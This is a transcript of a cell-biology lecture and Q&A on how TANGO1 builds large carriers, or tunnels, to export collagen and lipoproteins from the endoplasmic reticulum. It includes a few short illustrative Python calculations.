So what happens is that a protein called Sar1, which lives in the cytoplasm in a GDP-bound form, interacts with Sec12, which is a transmembrane protein of the endoplasmic reticulum. This exchanges GDP for GTP, and when that happens this protein Sar1 exposes an amphipathic helix which inserts into the outer leaflet, thereby bringing this protein into the ER membrane. Sar1-GTP then binds to a dimer which is made up of Sec23 and Sec24. Now there are different isoforms; you needn't worry about that at this stage. Now this dimer has the potential or the ability to start collecting cargos. So Sec24 has the ability to bind to receptors which can then bind to soluble secretory cargos. So this is a way to collect material in the lumen of the endoplasmic reticulum and connect it to the inner layer of the COP2 coat. Now the binding of this dimer to Sar1, once the cargos are associated, then recruits another dimer which is made up of Sec13 and Sec31. There is only one isoform of Sec13 but there are two of Sec31. Now the binding of this dimer to Sec23 and Sec24 starts turning off or terminating this process. So Sec31 has the capacity to increase the GTPase-activating activity of Sec23, thereby converting Sar1-GTP back into Sar1-GDP, and when the GTP-to-GDP switch is made, that basically is the signal for the cells to terminate the production of this particular container. And so what happens is that a COP2-coated vesicle then emerges from the endoplasmic reticulum, and it can then be targeted to the Golgi. Now these vesicles, COP2 shown here and COP1 shown here, have been purified, they've been studied extensively. Hello Tommy. They've been studied extensively for the last 30 or so years, and we know a lot about them. So almost all the components of these coated vesicles have a role in protein secretion. But there is a common feature here that is worth mentioning, and the feature is to do with the size of these vesicles. They are about 60 nanometers in diameter and they look very homogeneous in size. Now this is fine for most of the proteins that are being secreted by cells, especially if you happen to be Saccharomyces cerevisiae, but we bipeds and mammals make a lot of proteins that just cannot fit into these vesicles. So for example, collagen. There are 28 different types of collagen that you and I make, and you need them for almost every cell-cell interaction. Without collagen you will not have bones to begin with. You will not have skin. Now the problem with the collagens is that they contain a very rigid triple-helical region which, in the case of collagen 7, which is absolutely necessary for the formation of skin, can be up to 415 nanometers in length. And this is really like a rod. There is no force inside the cell that can bend this rod into a structure small enough to be encapsulated into a COP2 vesicle. So the question then becomes how a cell which needs to secrete collagen, and believe it or not, collagen composes 25% of your dry body weight, so these are the most abundant of the secretory cargos, how such a cell can export something so big by using a vesicle that is only 60 nanometers in diameter. Now similarly, cells of the liver and intestine secrete chylomicrons and very low density lipoproteins. These are basically lipid droplets coated with specific proteins, and they are secreted, and their job is to scavenge or transfer cholesterol and triglycerides in circulation.
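As a purely illustrative aside, the termination step of the COP2 assembly cycle described above can be caricatured with a toy calculation: stronger GAP stimulation by Sec31 lowers the steady-state level of membrane-bound Sar1-GTP and so ends coat assembly sooner. The rate constants below are arbitrary; this is a sketch of the logic, not a model of the real kinetics.

```python
# Toy discrete-time balance between Sec12-driven GDP->GTP exchange (loading Sar1
# onto the membrane) and GAP-driven hydrolysis (removing it). Arbitrary units.
def sar1_gtp_steady(gap_rate: float, steps: int = 200, dt: float = 0.05) -> float:
    exchange_rate = 0.5          # hypothetical Sec12 exchange rate
    sar1_gtp = 0.0
    for _ in range(steps):
        sar1_gtp += (exchange_rate * (1.0 - sar1_gtp) - gap_rate * sar1_gtp) * dt
    return sar1_gtp

print(f"Sar1-GTP with Sec23 alone:       {sar1_gtp_steady(gap_rate=0.2):.2f}")
print(f"Sar1-GTP with Sec23 + Sec31 GAP: {sar1_gtp_steady(gap_rate=2.0):.2f}  (lower)")
```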
And again these can be huge structures, and they cannot be accommodated in a COP2 vesicle. So how big are these droplets? As big as 100 to 150 nanometers. But remember, you are not secreting one droplet at any given time. You are secreting many of these. So the question then becomes how a structure that is only 60 nanometers can contain many of these. Now finally, to get to another point, we produce about a liter of mucin per day, which is absolutely necessary for the lining of your epithelium all the way from your nose to the very end, and its job is to protect the underlying tissue from pathogens. And there are 21 different kinds of mucin genes. Again, huge molecules, and you make a liter of mucin per day, and these are again far too big to be transported by COP2 vesicles. So the question is how the cells are transporting these molecules, because they are certainly very, very important for our physiology. So over a number of years, running into 10 years, and I must admit Alberto Luini is sitting here, so he should be credited for rekindling this field of biology, and it was Alberto's paper in 1998, in fact I was visiting his lab at that time, which highlighted this issue: the current understanding of that time, meaning COP2-mediated vesicular transport, just couldn't explain how collagens are transported, because they were just far too big. People had simply ignored this issue, and when challenged, people would just say, well, there must be some variants of COP2 and COP1 vesicles that can do this job. But it turns out that it is not so simple. So many years ago, I think 2005 or 2006, we performed a genome-wide screen in metazoans and we looked for new proteins that had not been assigned a function in the secretory pathway, and we isolated lots of genes that were new in this business, and we called them Tango, for transport and Golgi organization, because I'm also fascinated by the structure of the Golgi and how it forms and breaks and is partitioned into daughter cells. So Tango1 is the protein that I'm going to describe to you today very briefly. It's a very large protein, a protein of 1907 amino acids. Its N-terminus is in the lumen. Its C-terminus is in the cytoplasm. In the cytoplasm it has a proline-rich domain and two coiled-coil domains. In the lumen it has 900 amino acids, which are not depicted to scale here, which are unstructured, and they turn out to be very, very important for the overall process by which cargos are exported. And again, if time permits, I will gladly discuss that. It has a coiled-coil domain and an SH3-like domain at the very N-terminus. So we had shown that the SH3-like domain binds collagen, and we had shown in 2009 that the proline-rich domain binds to Sec23. So this gave us reason to believe that this protein must have a role in trafficking. And when Kota Saito was in my lab, he was also able to show that Tango1, so this is the endoplasmic reticulum, Tango1 localizes to very discrete sites at the ER, and these sites happen to be the ER exit sites. So these are places where cargo is collected, and this is where you generate the transport carriers which will then move the cargo from the ER in the direction of the Golgi. So Tango1 binds to Sec23, it binds to collagen, and it localizes to the ER exit site, so the thinking would be that it must have a role in the export of collagen. And the answer is yes, it does. So if you knock down Tango1 by siRNA, now of course one would do CRISPR, but this was 2009, 2010, there's about an 80% reduction in the amount of collagen.
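Coming back to the size problem posed above, a little arithmetic with the quoted numbers makes the mismatch explicit. This is only a back-of-the-envelope check: a rigid rod needs a carrier at least as wide as the rod is long.

```python
# Compare the quoted cargo dimensions with a standard ~60 nm COP2 vesicle.
cop2_diameter_nm = 60.0
cargoes_nm = {
    "collagen VII rigid rod": 415.0,
    "chylomicron / VLDL particle": 150.0,
}

for name, length in cargoes_nm.items():
    min_diameter = length                                 # smallest enclosing sphere for a rigid rod
    area_ratio = (min_diameter / cop2_diameter_nm) ** 2   # membrane area scales with diameter^2
    print(f"{name}: needs a carrier >= {min_diameter:.0f} nm, "
          f"~{area_ratio:.0f}x the membrane area of a {cop2_diameter_nm:.0f} nm COP2 vesicle")
```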
Here I'm showing you collagen type 7 that is secreted, compared to the control, and there is a concomitant increase in the intracellular pool of collagen, which is found arrested in the ER. This is just a quantitation of this process, and this is just to show you the level of knockdown that we can achieve by this particular procedure. So this told us that Tango1 was required for collagen type 7 export from the cells. Now soon thereafter I was very pleasantly surprised that friends, people that I had been in contact with, Andy Peterson and colleagues at Genentech, were able to generate a mouse knockout of Tango1. We were also trying to generate one, but we are not very good mouse geneticists and we lost to our dear friends. They were able to create this mouse knockout. So MIA3 is the same as Tango1, it's just a different name for it. So they were able to generate a mouse knockout for Tango1, and what they found was that the mouse dies at birth. It dies at birth because it does not have any mineralized bones. So the bones are really like rubber, and in fact many of the bones are missing. And so it dies, and it has this defect because it fails to secrete many of the collagens they looked at: types 1, 2, 3, 7, 9 and 11. So this therefore gave us the hope that, A, Tango1 has a role in collagen export, and B, even more importantly, it is not just collagen type 7 that we had studied, but many of the collagens most likely follow the same pathway. And this also gave us the confirmation that whatever we had been doing in the tissue culture system has an in vivo physiological significance, therefore it was time to dig deeper into the problem. And by deeper I mean: how does Tango promote collagen export? And this is where we've made some very interesting findings. So it turns out, as I told you earlier, the proline-rich domain binds to the COP2 coat protein Sec23; that's what we had shown before. I'm going to show you, from our work and the work of others, that the SH3-like domain binds to cargo, and I'm going to show you our work that this particular domain here is required for the recruitment of membranes. The point being that the mechanism by which Tango1 generates the big transport carrier that you need is not simply by collecting membranes from the ER and creating a transport carrier; it's a completely different mechanism. So we had shown that this part binds to Sec23, but Jonathan Goldberg, two years ago, quietly published a paper, well, not quietly, he published a paper in 2016 in PNAS in which he was able to co-crystallize parts of Tango's PRD with Sec23, and what he found was that these parts contain triplets of prolines, and Tango1 contains seven such proline triplets, and it is these particular prolines that bind to Sec23. So he was able to narrow it down to the mechanism, or the structural aspects, of how Tango interacts with Sec23. So this was great confirmation for us and very valuable for further dissection of this process. And in the same year, Hans Peter Bächinger found and reported that the binding of the SH3-like domain to collagen that we had proposed and reported is not direct but is mediated through a protein called HSP47. So this again solves a problem for us, because as I said there are 28 different types of collagen, so it was difficult for us to envision how this particular protein would bind to all the different collagens; HSP47 therefore acts as an acceptor.
Now I should also mention that while HSB 47 is an acceptor for collagen type 7 and many others there are collagen that do not interact with HSB 47 but they interact with other chaperones and so our thinking is that this protein can interact with collagen through different molecules and not all of them have to work through HSB 47 but in principle the connection between collagen and Tango is mediated by a connector in between which is in the case of collagen type 7 at least HSB 47. And you know all of them yeah? We don't know all of them but we know for a few of those. You know again it will become a detail I mean I think the principle is has been established through a specific. This one is very specific because you know how it works again I don't know how I'm going to run a time you know the collagen primers start at one end and as they are folding these proteins start binding they bind in fact Nagata had previously supported the idea that these were chaperones for folding and that turns out to be not true. What they do is they bind to the fully folded part and as it is being zipped as it is being folded this binding increases. So I think this interaction brings to this particular molecule the part that is folded. If I have time I'll try to explain to you how this unstructured part and this one works together to only collect fully folded collagen for export. So this was again a great piece of confirmation for us. Now so the question then becomes you have very big molecules and need to export them so how do you do it? So one possibility is that in order to make a big transport carrier you need more membrane. So one possibility is that if you use a cop to code so the idea is that if a cop to code needs to make a small vesicle it assembles into a small structure and then it pinches okay and you get a membrane that's about 60 to 90 nanometers in diameter but if you want to make a big one all you do is you make a very big code you instead of using a handkerchief to collect this much material you throw in a big towel you know just collect big membranes. Would that be the way to generate a transport carrier? The alternative so this is basically it right. So if you want to make a vesicle of this size you have a code structure let's assume 100 nanometers by 100 nanometers okay but if you want to make a big structure to carry collagen the size of the code is huge but I'm going to tell you that this is not how the structure is generated. The reason for that is that we looked at a patch of collagen so this is looking at a patch of collagen which has not left the ER yet and these gold particles are gold particles to show that we're looking at collagen. It is huge okay this is about almost reaching about 500 nanometers. Now we expected so red here is the same as this one is collagen and the green structures you see are copter codes it doesn't matter whether you use sec 23 or sec 24 okay so I expected to see a complete area here covered by these green structures so instead of seeing this punctate elements I expected to see a sheet of code on top of these structures and we did not see that so this made us think that perhaps there is a different way to generate this mega transport carrier and Antonio Santos when he was in my lab he made a very peculiar observation he found that when collagen are about to leave the ER here again shown in red these structures seem to be studied with membranes that contain a protein called Ergic 53 so what is Ergic 53? 
It is a compartment or it's a collection of membranes in between the ER and the Golgi and their job seem to be material coming from the ER comes as far as Ergic 53 compartment and then they go back okay and they go back mostly by cop on vesicles what becomes of Ergic 53 is still kind of unclear so you can call them Ergic 53 containing membranes or you can call them cop 1 vesicles that contain Ergic 53 it doesn't matter so ordinarily we saw or Antonio saw that these membranes were tightly opposed to collagen patches but if you look at cells from which kind Tango 1 has been deleted these membranes are still there but they're not attached to patches of collagen so this made us think that perhaps these membranes are being recruited by Tango and their fusion is their fusion to these membranes or these patches is what is providing the extra membranes required for generating these big structures so I'm going to come to that but I just want to highlight what is this particular region of Tango which recruits these membranes so we were able to pin it down to a stretcher for amino acids about 150 amino acids from here to somewhere in between to the middle of the coil called first of Tango 1 and we call this domain tier which stands for tether for Ergic at ER so what you can do is you can take these 150 amino acids of Tango 1 and put it at the mitochondria artificially and when you do that the Ergic membrane simply go to the mitochondria so instead of coming to the ER they simply are diverted to the mitochondria so this told us that this part has the capacity to recruit Ergic membranes and so we can now this is not published but we can now keep on cutting this structure into smaller and smaller pieces and it turns out amino acids 1255 to 1296 of Tango 1 have the capacities it's about 50 amino acids so we take this 50 amino acids and put them on mitochondria then Ergic membranes go to the mitochondria if you put them on plasma membrane then Ergic membranes go to the plasma membrane. Remember it's lipis plus proteins. Yeah. You know which proteins being actually involved. I'm going to tell you that just you're too quick it's a bit early for me but yeah I'm going to get to that point yeah so I'm just trying to tell you that there is a mechanism built into Tango which has the capacity to recruit Ergic membranes okay and we can narrow it down to 50 amino acids now and we can use this 50 amino acids as a peptide to inhibit collagen secretion to be quite honest with you. It's very simple and it turns out the first Coil-Coil domain that I showed you is not just one contiguous Coil-Coil domain it is made up of three Coil-Coil domains and the tier domain is this part here which is made up of these many amino acids so this tells us that Coil-Coil domain I initially thought would be a rod like structure but it is made up of three bits that can bend okay. Now the idea then is that this part here can recruit Ergic membranes they fuse and their fusion and rapid built into the structure that is growing out is what creates a mega transport carrier but is there any evidence that these membranes fuse to the ER and the answer is yes. 
So fusion requires these specific proteins called SNAREs; they have to assemble at the site where a vesicle is fusing with the target membrane, and we know a lot about these proteins, so I'm just going to simply run through it. It turns out there are three t-SNAREs and one v-SNARE; v is for vesicle and t is for the target membrane. So we were able to show that the t-SNAREs Syntaxin 18, USE1 and BNIP1 were required for export of collagen from the endoplasmic reticulum. Tango1 of course is necessary because it acts as the receptor for collagen, okay. Syntaxin 5 is not a surprise, because if you knock down this particular SNARE then there is no Golgi apparatus, and therefore the end product would be a defect in secretion, okay. Now if there are t-SNAREs there must also be a v-SNARE. There are many v-SNAREs that work at the ER-Golgi interface, but the point to remember here is that YKT6, this one, if you remove that from the system then collagen export from the endoplasmic reticulum is blocked, whereas knockdown of Bet1 and Sec22b has no effect, okay. So this told us that the membranes that are being recruited to the ER exit site via the function of Tango1 do fuse, and it is their fusion that is necessary for the export mechanism. Now I have to sort of go through this model building a little bit in order to explain the data. So what we propose is the following: in the lumen of the endoplasmic reticulum, and the lumen is the inside of the ER, the ER is a container, right, a membrane-bounded compartment, so it will have a lumen and it will have a face that is on the side of the cytoplasm. So in the lumen of the ER this SH3-like domain binds to collagen, through HSP47, and this binding, we propose, initiates the interaction of the proline-rich domain with Sec23, and this is how this reaction starts. Now at this stage we propose, and this is fictional, and this is something that we are trying to address now in the lab, that there is a mechanism by which collagen is being pushed into a structure that is growing on the cytoplasmic side, okay. Now this pushing is probably mediated by the SH3-like domain through HSP47, which might just be sort of walking on the collagen as it's assembling, okay. This also relies on collagen having a binding partner here, because if you have a container that is growing and this part is anchored and this is not, it's going to do this; so it helps if it is anchored, and we don't know what this anchoring mechanism is, but we think it might be that it is anchored to integrins as they are leaving the ER. Now based on the fact that there are two coiled-coil domains, and the coiled-coil domains can extend up to about 40 to 50 nanometers, we propose that a bud can be created through this interaction alone, which would be about 40 to 50 nanometers, but still not sufficient to grow a structure commensurate with the size of the collagen. Now what is your green structure? Is this a patch of membrane? These are COP2 coats. This is the membrane. But the membrane which has been added? Well, it's coming to that. Up to this stage we think there is no membrane added here, okay. Now we also propose that if this is true then Tango should be a ring. So if you imagine this in three dimensions, then Tango would just basically circle this structure as a ring, perhaps at the neck of the transport carrier that is coming out of the ER.
And one day lo and behold Ishir who really is probably one of my best postdocs ever in the last 30 years comes up to me and he says Vivek I have data tango one assembles into a ring at the neck of a structure that is coming out of the ER. And by a ring he means this. So this here in green is tango and red in the middle as you see are copter coats. And it turns out that if you were to look at is if this is the ER this is the structure that's coming out this is the lumen this is where the collagen is and it's dripping on my palm the liquid. The collagen would be inside tango is a ring here okay. And this is the membrane and the coat the cops would be in the middle. So this is quite fascinating because what it tells us is that tango has a capacity to form a ring assemble into a ring and the cops are in the middle and the structure is going to grow in this form here. And this is about 300 nanometers but we have data now that this can be made to shrink and expand based on the dynamics of tango. Now at this stage. Well I think tango is not stretching like N2C terminals it's basically assembling laterally into a ring like this. Just one. It's just a polymer. It's just give me a few. It's a polymer. It's a polymer. But it's not a homopolymer. It gets complicated. So at this stage we propose that these membranes, Ergic 53 containing membranes are being recruited which will fuse here through the action of the snare mediated pathway. Now as these membranes fuse. You had asked earlier someone had asked earlier how does this tier domain recruit or what does it bind on these particular membranes here. So most recently this is a paper of us that just got accepted this morning. What we have found is that if this is a ring of tango the red dots that you see here are in fact a set of tethers. There are three proteins. They're called the NRZ complex. It's a detail. But basically tango through tier domain recruits these tethers and these tethers then recruit the Ergic membranes. And it really is quite spectacular because we find these tethers usually either on one side of the ring or at most at the opposite pole. So I think what might be going on is that one half of tango ring and another half of tango ring somehow is brought together and it's at these nucleation sites. The sites where the tethers are and they do like this and you end up with a full ring. So you have a complex of tethers here and you have a complex of tethers here which then recruit Ergic membranes. And so this is a picture that we don't, nobody in my lab wants to do microscopy. We've been blessed with an absolutely wonderful microscopy facility. So by using super resolution microscopy we've finally been able to capture images of a ring of tango, Ergic membranes and the tether. So this just shows you how this whole complex is brought together. So these are the membranes that would be fusing in this domain to allow the structure to grow in size. Now once these membranes start fusing this structure is going to grow and it grows to a size which is large enough to encapsulate collagen. Once the collagen has been placed into this container the SS3 domain dissociates from the collagen molecules. When this dissociation takes place the proline rich domain dissociates from SEC23 which allows SEC1331 to bind here. This binding initiates this GTP hydrolysis cycle that has been suggested long time ago which would then in principle at least cut the membranes here to now create a big transport carrier as shown in this reaction. 
So this therefore is a working hypothesis of how we believe tango can promote the capture of specific cargoes and allow the cells to create by recruiting other components a mega transport carrier from the ER. So it is in principle different from how a COP2 vesicle is generated. But it is not going to be as simple as we have been saying because it turns out that tango has other family members so this is a full length tango. There is another protein that has been identified it is called tali or it is also given the name mya2. So this protein turns out to be present only in liver and intestine. And we have shown that just like tango is required for the capture and its export of collagen, tali in the cells that express it is required for the export of kylo-microns and VLDL which are again very big particles. So it is similar principle but there are slight differences. It is not the same but it is a related protein. They have the same domain structure meaning it has two coil-coil domains in the cytoplasm, it has a proline rich domain, it has an SS3 domain. But tali lacks this luminal coil-coil domain. Now it turns out that tali is spliced to give rise to two proteins, a protein called C-tage 5 which is expressed in every cell type. So C-tage 5 and tango short form a complex and there is also a splicing of tango 1 to generate a protein called tango short. I should have written it here but it is not. So the ring of tango that I showed you is composed of tango 1, C-tage 5 and tango short. So it is a polymer of three very related proteins. Now in certain cancer cells this protein mea 2 which is basically a part of tango and tali where you cleave here. So you have the luminal part which has the capacity to bind collagen. This is secreted. And when it's secreted there are groups who are working on this. Their thinking is that this can sequester collagen in the extracellular matrix and by sequestering collagen what it does is it prevents the assembly of ECM and because it prevents the assembly of ECM you have the possibility of promoting metastasis. We are not working on this. So this is just to show you that there is tango 1 which has the capacity to bind to cargos, there is tango short which is just like tango 1 but it cannot bind the cargo and there is C-tage 5 which is again related to tango but it cannot bind the cargo. The three of these proteins are usually found in a complex and a lot has been known about which part binds where etc. So those details are available. Each one of them is required for this exit of collagen? Well this tango is absolutely necessary. If you don't have these ones there is a defect and I think it's simply because what they might be doing is to provide the proline rich domain which has the capacity to interact with sec 23. So instead of just providing monovalent interactions what you're doing is you're increasing the valency so you increase the affinity. Now here it gets a bit complicated. So I've told you that you generate a transport carrier of this kind, big structure that leaves the ER and takes collagen to the Golgi but you know no one has been able to visualize these big collagen containing carriers except one report and if the time permits I'll be happy to go over what that means. So is it possible that when collagen are being pushed through the function of tango and associates into a structure that is growing? 
What happens is this structure here, at this end, fuses to the Golgi cisterna, and if it were to fuse to the Golgi cisterna prior to the fission here, what you will end up with is a kind of conduit, a tunnel between the ER and the Golgi, and the collagen would basically simply go across the channel - it's like Calais to England, the trains are going across - and there is no transport carrier per se. Once the collagens have been transferred, then you cut here, and once that structure is cut it's simply absorbed into the first cisterna of the Golgi. So this basically means that there is no specific transport carrier per se; what you do is you create a tunnel for a short time, which allows cells to push these kinds of big molecules from here to here. And the first cisterna of the Golgi, which then contains collagen, just keeps moving forward, and this is what cisternal maturation is all about. This structure again doesn't need to then pick collagen into a big transport carrier and move it to the next one, next one, so on and so forth. So what happens is, as the collagen leaves the ER it is already in a cisterna of the Golgi, and the cisterna simply continues to mature, because there is no other TANGO1-like molecule in the secretory pathway. They're all at the level of the endoplasmic reticulum. So this also helps us understand how there is no further sorting of the molecule once it has left the endoplasmic reticulum. So we are really keen on this model and we are testing it extensively. Now you might ask how many collagens would be secreted if this was the case. We've been able to do some calculations, putting things together with Matthias Mann and Ben Glick. So it turns out there are about 40,000 TANGO1 molecules in cells that secrete collagen. The number of ER exit sites is an estimate, but it's between 200 to 400 in mammalian cells. So from this we calculate that there are about 100 to 200 TANGO1 molecules per ER exit site. And since each TANGO1 binds to one collagen trimer, this allows us to guess that there could be 100 to 200 collagen trimers exported per ER exit site, which is this. So this gives us an estimate of how much collagen, because these, as I said to you, are the most abundant secretory cargoes. They have to be secreted in huge amounts and very fast. So this might be. So but you still have a problem going through the Golgi stack, but because you have these tunnels and the maturation, how do they get out of the Golgi to the plasma membrane? Well, the same cisterna - when you get to the last one it has nothing but just collagen. Oh, so it fuses as a cisterna, not as a... So there are no vesicles coming. But here they are making a fusion. Sure, of course, for every structure that has to fuse there will be fusion components. If you do an ER-Golgi fractionation on cells that are actively secreting collagen, do you now pull out Golgi apparatus in the ER fraction? It's very hard to do that, Tommy, but the best is to do this live-cell imaging, and this is exactly what we are trying to do. You know, we spent years purifying Golgis, and you can never, ever get, first of all, a pure Golgi. There's always some Golgi in the ER fraction and there is always some ER in the Golgi fraction. So that wouldn't work. What do you think would be the transfer? So in chondrocytes the export of collagen from the ER to the outside is like in five minutes. It's the fastest. So if you would lock this cell... We are trying to find a way to lock it for electron microscopy. Electron microscopy. You would trap the intermediate. 
So we are trying to do that. We are using TANGO1 bits and pieces where you allow it to latch onto the COPII coats but they cannot come off. So we think we might be able to see these connectors. But you need a transport... Sorry, you said that there are like, I don't know, how many hundreds of events per minute, right? So if I would just snapshot the cell and do a 3D EM, I should see the connectors. Do it. We are looking for someone - I would love to. I mean, this is exactly what we would like to do. Why do you invoke the need for connectors as opposed to creating a vesicle that then fuses? We haven't seen it, David. I mean, you know, we've been searching for years, and so has the whole field, to see. There are vesicles that have been seen in post-Golgi events. But it isn't clear whether they are vesicles or they are just cisternae. I mean, Alberto might have more on this if he's going to talk about it. But we have never been able to see something that has separated from the ER and is en route to the Golgi. We have seen collagens that are separated from the ER in big structures, but they are not going to the Golgi. They are going to the lysosomes for degradation. Maybe there is another question. The key to those experiments will be to have the right cells, and cells that are actually actively secreting collagen. Because a lot of the models are cells that are probably not very active, and probably that's why you haven't seen it. So dermal fibroblasts... So we do it in RDEB cells. RDEB cells are the best cells for studying collagen type 7 because they produce... These are the skin cells, so they are keratinocytes producing lots of collagen. So if we cannot see them there, then there is... RDEB. These are the cells of patients with epidermolysis bullosa. So they are producing gobs of collagen. So let me just... I mean, again, we can... Okay. With this, what you are losing is the directionality that is normally given by physical attractorism. Well... How do you see the directionality to be given here? Well, yeah, there are issues. I agree. I mean, one possibility is that this binding and pushing mechanism is what is responsible for the directionality. I mean, I was thinking you might ask, well, things... Other things would leak out. Yeah, calcium. Yeah, but the thing is that you could bring them back. I don't know. Calcium? No, calcium... Calcium, you might be able to pump it out. There are SERCA channels, the SPCA channels, at the Golgi. They can take care of that if the need be. I don't know. I mean, I... Do you think your disordered domain is important in making some sense of this? Yeah. So, okay. God, you guys are... I will need more time. I think we have to figure out that TANGO1 has some 900 amino acids that are unstructured. They bind to collagen weakly, but there comes a time when the binding becomes very tight. So, we think the SH3 domain binds to HSP47 and, as collagen is assembling, the unfolded part is bound to the unstructured part. And this unstructured part simply separates into... It undergoes phase separation. We're doing this with Tony. And this is responsible for the directionality and pushing. So, it's all coming together, but we're not quite there yet. That's why I'm just trying to present it, to get your feedback. Anyway, so, unstructured part... The lipids? The lipids... No, lipids, I don't think I will get into the lipids. We have no way of knowing. I mean, we still don't know the lipid composition of a COPI or a COPII vesicle. So, going there would be... I would need another lifetime. 
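Since the flux estimate quoted a little earlier (about 40,000 TANGO1 molecules per cell, 200 to 400 ER exit sites, one collagen trimer per TANGO1) is pure arithmetic, here is a minimal sketch of the same back-of-the-envelope calculation; the input numbers are the approximate values from the talk and nothing else is assumed.

```python
# Rough estimate of collagen export capacity per ER exit site,
# using only the numbers quoted in the talk (all values approximate).
tango1_per_cell = 40_000          # TANGO1 molecules in a collagen-secreting cell
er_exit_site_counts = (200, 400)  # estimated range of ER exit sites per cell

for n_sites in er_exit_site_counts:
    tango1_per_site = tango1_per_cell / n_sites
    # One TANGO1 is assumed to engage one collagen trimer,
    # so trimers per exit site ~ TANGO1 molecules per exit site.
    trimers_per_site = tango1_per_site
    print(f"{n_sites} exit sites -> ~{tango1_per_site:.0f} TANGO1 "
          f"and ~{trimers_per_site:.0f} collagen trimers per site")
```

With 400 exit sites this gives roughly 100 TANGO1 molecules (and collagen trimers) per site, and with 200 sites roughly 200, matching the 100-200 range quoted in the talk.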
Now, let me just... I just want to come to a few more things before I leave. So, you know, we are good at doing... I think we are reasonably good at doing what we do in the lab, figuring out TANGO1 bits and pieces. But, you know, we are also getting very excited about the fact that ourselves and others are trying to see if we can use inhibitors of TANGO1 to control fibrosis, which is hypersecretion of collagen. So this group at the Mayo Clinic, in fact, has been able to show, at least in a mouse model - what they do is they can induce liver fibrosis by using bleomycin. So what they do is they knock out TANGO1 in the liver and then treat the mouse with bleomycin. It doesn't develop fibrotic tissue. So there is a way to do this, and we are collaborating with people where we can deliver RNAi and CRISPR tools for TANGO1 directly to the liver, to see if we can control this in mice, not using this approach but better approaches. So there is a potential, or perhaps a possibility, that we might be able to attack the issue of fibrosis, for which there is absolutely nothing you can do at this stage. Now, this is the lab, but this is... Fred Bard started this whole screen of TANGO genes. He is here now. Kota Saito is the one who decided to work on TANGO1 from all the 74 TANGOs that we had, and I'm thankful to him. He is at Tokyo University, and as of last week he's now been made a full professor at Akita University. He's probably one of the youngest professors there. Patrick, Christina and Antonio, postdocs - they were the ones who showed that TANGO1 recruits ERGIC membranes to collagen patches, so this really is a new way of thinking about how big transport carriers are generated: not simply by acquisition of membrane by coats, but by addition of membranes. And Ishier, Maria and Felix. Felix is a physicist in the lab, and they have figured out how TANGO1 assembles into rings. Now, I have a few minutes left, so I just want to run through a few experiments. So now we know what parts of TANGO1 interact with COPII coats, what parts of TANGO1 interact with cTAGE5 and TANGO1-Short, and the TEER domain, et cetera, et cetera. So we start asking a very simple question. How does TANGO1 assemble into a ring? So again, by modeling this process, what we are proposing is that TANGO1 should be - so this blue is TANGO1, and this yellowish-brownish color are the COPII coats. So the COPII coats are being corralled by TANGO1, and we say that TANGO1, whether it's a homomer or a heteromer - TANGO1, cTAGE5... Because this is what creates the... Okay, fine. So we say that it forms a filament. So it's a filament in the membrane. Now, the filament wets the edges of the COPII coats. So it acts literally as a lineactant, and by doing so, what it's doing is it's controlling the dimensions. So ordinarily what you would have is the filament will bind, or will wet, the rims of the COPII coats and therefore contain the COPII coats in the middle. Now, if you want to make a bigger structure, what we are saying is that these filaments can fuse with other filaments in the vicinity and you end up getting a bigger structure. Okay? Now, how do we know that? So in order for TANGO1 to form a ring, it has COPII in the middle, so there are interactions of TANGO1 with COPII components, as shown here with these lines. And we know that this is through the proline-rich domain, and this is on the Sec23 coats. So if you now knock down COPII, you can do it two ways, right? 
You can express a TANGO1 that doesn't have a proline-rich domain, or you can remove Sec23, and you come to the same conclusion. What happens is you don't form rings. What you end up getting is a structure that is highly tessellated. So basically what we have done is we've reduced the interaction of the proline-rich domain with the COPII coats, but not the lateral interactions, which we think are being mediated by TANGO1 interacting with itself, TANGO1 interacting with cTAGE5 and TANGO1 interacting with TANGO1-Short. And in doing so, you end up getting these highly tessellated structures. Now, this is just to show you another example: if we now affect the COPII interaction - in this case we have expressed TANGO1 without the proline-rich domain - you end up getting these sort of long stringy elements. There are little rings sometimes, but the rings seem to be fused, and it is depicted in this pictorial form here. So I think what this is allowing us to test is, finally - I'm not going to go through the whole process - if you, for example, remove the ability of TANGO1 to bind the collagens, it's a complete block in ring assembly. So it appears that the binding of the cargo to TANGO1 and the binding of TANGO1 to itself and its associates is the process that is absolutely necessary to generate these structures. And this is the direction that we are going in, to try to understand how this structure is assembled at the ER. That's about it. I think I'm done. I'm going to stop here and gladly answer any questions. Thank you very much. I wonder what happens at the trans-Golgi, more downstream? Do you think any special mechanism will operate there? Well, we've tried very, very hard. All the TANGO1-like proteins that we found, for export of chylomicrons and a completely new one for mucins, they all seem to be at the ER; there's nothing at the level of the Golgi. So my feeling is, once you leave the ER, you don't need to sort these elements again. The structure that contains these big particles simply keeps moving forward. So there isn't a need to re-sort them into specific vesicles. This is the simplest answer. I mean, there might be other components that do it, but we haven't found them. And to be quite honest with you, I think if we could just solve it at the level of the ER, I think that would do it for me. So in terms of the force and the movement of the collagen, isn't this reminiscent of the translocation of unfolded peptides across the ER and the HSPs? And TANGO1 can somehow provide some force that will... So you're right. Yeah, you're right. So there is the unstructured part. And when you do an IP of TANGO1 - so we can purify TANGO1. In fact, David is sitting here. We can now express TANGO1 in Pichia pastoris. It's taken us a long time. We're trying to engineer it to answer some of these questions, to see if we can express TANGO1 in Pichia and what it does. So we can express it. It took almost three years. It goes and forms a ring around COPII coats. That's all we can do thus far. Ultimately, I would like to be able to see if we can secrete collagen. So we're doing bioengineering in a way. When we look at the components that bind to TANGO1 in the lumen, they seem to be collagens and collagen-like molecules and chaperones. They bind to a lot of chaperones. So we think it is not just HSP47 and that's it. They are switching chaperones. When they switch these chaperones, we don't know. We would like to be able to test when these chaperones come into play, at what stage. But it has not been particularly easy. 
